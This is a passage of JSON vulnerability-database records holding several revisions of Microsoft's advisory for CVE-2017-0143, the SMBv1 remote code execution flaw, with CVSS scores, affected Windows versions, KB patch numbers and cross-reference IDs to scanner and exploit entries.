Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T10:44:22", "differentElements": ["msAffectedSoftware"], "edition": 20}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-08T14:45:18", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-08T14:45:18", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-08T14:45:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4012214", "KB4012217", "KB4012212", "KB4013429", "KB4012213", "KB3210721", "KB3212646", "KB3210720", "KB4012606", "KB3177186", "KB4012216", "KB3205409", "KB3213986", "KB4012598", "KBMS16-110, 3187754", "KB4013198", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T14:45:18", "differentElements": ["msAffectedSoftware"], "edition": 21}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-08T16:54:43", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4012216", "KB3205401", "KB3205409", "KB4012215", "KB4012212", "KB3177186", "KB4013429", "KB3212646", "KB3210721", "KB4012213", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB4012217", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", 